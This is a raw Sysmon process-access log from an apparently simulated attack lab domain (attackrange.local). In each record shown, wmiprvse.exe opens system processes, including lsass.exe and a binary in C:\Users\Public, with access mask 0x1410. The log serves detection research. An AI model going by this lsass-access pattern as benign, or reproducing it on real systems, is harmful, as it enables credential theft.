15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026204Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026203Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026202Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026201Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026200Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026199Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026198Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026197Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026196Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026195Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026194Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026193Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026192Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026191Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026190Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026189Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026188Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026187Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026186Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026185Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 